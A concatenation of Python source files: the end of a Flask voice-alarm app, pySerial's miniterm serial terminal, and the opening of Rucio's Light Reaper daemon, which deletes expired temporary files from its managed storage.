del listforalarm[0]
if clock()+" with weather"==listforalarm[0]['content']:
weather()
covid_update()
tts_request("You have an Update")
del listforalarm[0]
if clock()+" with news and weather"==listforalarm[0]['content']:
news()
weather()
covid_update()
tts_request("You have an Update")
del listforalarm[0]
def alarm_run():
while True:
notif_update()
(do_alarm())
time.sleep(59)
thread = threading.Thread(target=alarm_run)
thread.start()
def update_label():
label=request.args.get('two')
if label:
return label
if __name__=='__main__':
app.run()
|
miniterm.py
|
#!/Users/pmorvay/Documents/Cisco/Devnet/nornir/venv/bin/python3.7
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
light_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019
#
# PY3K COMPATIBLE
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=1, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rses)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
replicas = list_expired_temporary_dids(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
try:
# pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
# lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
# operation='delete', scheme=scheme).values()[0])
pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
# logging.debug('Light Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Light Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Light Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Light Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_temporary_dids(dids=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Light Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
